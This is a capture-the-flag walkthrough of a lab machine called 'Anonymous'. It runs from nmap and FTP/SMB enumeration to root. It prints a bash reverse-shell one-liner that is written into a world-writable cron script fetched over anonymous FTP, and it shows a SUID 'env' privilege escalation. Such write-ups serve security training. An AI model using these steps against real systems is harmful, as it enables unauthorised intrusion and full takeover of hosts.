Enumeration
Nmap
┌──(alen㉿kali)-[~/Downloads]
└─$ nmap -p- --min-rate 5000 10.10.73.218
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 10:20 +04
Warning: 10.10.73.218 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.73.218
Host is up (0.15s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
13114/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds
┌──(alen㉿kali)-[~/Downloads]
└─$ nmap -A -p 21,22,139,445 10.10.73.218
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 10:21 +04
Nmap scan report for 10.10.73.218
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.100.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUSx00
| Domain name: x00
| FQDN: anonymous
|_ System time: 2025-05-21T06:21:49+00:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-05-21T06:21:49
|_ start_date: N/A
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 142.45 ms 10.14.0.1
2 142.68 ms 10.10.73.218
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.13 seconds
FTP Enumeration
┌──(alen㉿kali)-[~/Downloads]
└─$ ftp 10.10.73.218
Connected to 10.10.73.218.
220 NamelessOne's FTP Server!
Name (10.10.73.218:alen): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||44207|)
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||8195|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1032 May 21 06:23 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> get clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||9807|)
150 Opening BINARY mode data connection for clean.sh (314 bytes).
100% |*********************************************************************| 314 4.40 MiB/s 00:00 ETA
226 Transfer complete.
314 bytes received in 00:00 (2.04 KiB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||55656|)
150 Opening BINARY mode data connection for removed_files.log (1032 bytes).
100% |*********************************************************************| 1032 15.62 MiB/s 00:00 ETA
226 Transfer complete.
1032 bytes received in 00:00 (6.51 KiB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
229 Entering Extended Passive Mode (|||9283|)
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
100% |*********************************************************************| 68 1.64 KiB/s 00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.35 KiB/s)
ftp>
From the Nmap Scan we have found that anonymous FTP Login is possible and after logging in we were able to find three files from FTP.
from the files we have found a clean.sh bash script which is running every minute, so we might be able to use the reverse shell to get the reverse connection
┌──(alen㉿kali)-[~/Downloads]
└─$ cat clean.sh
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
We can actually see the output of the file from removed_files.log file
──(alen㉿kali)-[~/Downloads]
└─$ cat removed_files.log
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
and there is a third file as well which has to do instructions which is not useful to us
┌──(alen㉿kali)-[~/┌──(alen㉿kali)-[~/Downloads]
└─$ cat to_do.txt
I really need to disable the anonymous login...it's really not safe
SMB Enumeration
┌──(alen㉿kali)-[~/Downloads]
└─$ smbclient -L //10.10.73.218
Password for [WORKGROUPalen]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP ANONYMOUS
┌──(alen㉿kali)-[~/Downloads]
└─$ smbclient //10.10.73.218/pics
Password for [WORKGROUPalen]:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Sun May 17 15:11:34 2020
.. D 0 Thu May 14 05:59:10 2020
corgo2.jpg N 42663 Tue May 12 04:43:42 2020
puppos.jpeg N 265188 Tue May 12 04:43:42 2020
20508240 blocks of size 1024. 13303292 blocks available
smb: > get corgo2.jpg
getting file corgo2.jpg of size 42663 as corgo2.jpg (26.6 KiloBytes/sec) (average 26.6 KiloBytes/sec)
smb: > get puppos.jpeg
getting file puppos.jpeg of size 265188 as puppos.jpeg (78.7 KiloBytes/sec) (average 61.9 KiloBytes/sec)
smb: > exit
We have done SMB Enumeration using smbclient but we have not found anything useful.
Now we can try to gain access to the system by uploading the bash reverse shell
Exploitation – Reverse Shell
We are going to replace the contents from clean.sh and put the bash reverse shell program into clean.sh file
┌──(alen㉿kali)-[~/Downloads]
└─$ cat clean.sh
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/10.14.100.15/4444 <&1'
Make sure that you have listening port also set up
┌──(alen㉿kali)-[~/Downloads]
└─$ nc -nlvp 4444
After a minute we were able to get the reverse shell
┌──(alen㉿kali)-[~/Downloads]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.14.100.15] from (UNKNOWN) [10.10.73.218] 59654
bash: cannot set terminal process group (13166): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$
Privilege Escalation – SUID
namelessone@anonymous:~$ find / -type f -perm -u=s -ls 2>/dev/null
find / -type f -perm -u=s -ls 2>/dev/null
66 40 -rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8268/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8268/bin/umount
2665 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/8268/usr/bin/chfn
2667 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/8268/usr/bin/chsh
2743 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/8268/usr/bin/gpasswd
2835 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/8268/usr/bin/newgrp
2848 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/8268/usr/bin/passwd
2958 134 -rwsr-xr-x 1 root root 136808 Oct 11 2019 /snap/core/8268/usr/bin/sudo
3057 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3427 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
6462 105 -rwsr-sr-x 1 root root 106696 Dec 6 2019 /snap/core/8268/usr/lib/snapd/snap-confine
7636 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/8268/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/9066/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/9066/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/9066/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/9066/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/9066/bin/umount
2670 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/9066/usr/bin/chfn
2672 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/9066/usr/bin/chsh
2748 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/9066/usr/bin/gpasswd
2840 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/9066/usr/bin/newgrp
2853 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/9066/usr/bin/passwd
2963 134 -rwsr-xr-x 1 root root 136808 Jan 31 2020 /snap/core/9066/usr/bin/sudo
3062 42 -rwsr-xr-- 1 root systemd-resolve 42992 Nov 29 2019 /snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3432 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/9066/usr/lib/openssh/ssh-keysign
6470 109 -rwsr-xr-x 1 root root 110792 Apr 10 2020 /snap/core/9066/usr/lib/snapd/snap-confine
7646 386 -rwsr-xr-- 1 root dip 394984 Feb 11 2020 /snap/core/9066/usr/sbin/pppd
131150 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
131140 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
131191 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
131084 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
131207 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
1050325 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
919490 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
923989 108 -rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
919683 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
919497 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
919679 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
919144 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
918992 36 -rwsr-xr-x 1 root root 35000 Jan 18 2018 /usr/bin/env
919017 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
919128 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
919127 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
918924 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
919126 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
918922 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
919269 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
919305 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
918871 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
919164 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
As we have failed to look into sudo misconfigurations, we went ahead it SUID Enumeration and we had found that env has a SUID Bit Escalation in GTFObins
namelessone@anonymous:~$ /usr/bin/env /bin/sh -p
/usr/bin/env /bin/sh -p
whoami
root
cd /root
ls
root.txt